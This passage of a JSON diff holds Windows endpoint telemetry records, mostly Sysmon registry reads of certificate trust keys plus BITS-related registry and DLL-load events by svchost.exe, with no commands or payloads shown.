"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": 
"BITS", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "FlightSettings.dll", - "image_path": "C:\\Windows\\System32\\FlightSettings.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, 
- "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { 
- "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bcd.dll", - "image_path": "C:\\Windows\\System32\\bcd.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", - "registry_value": "Start", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879020000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 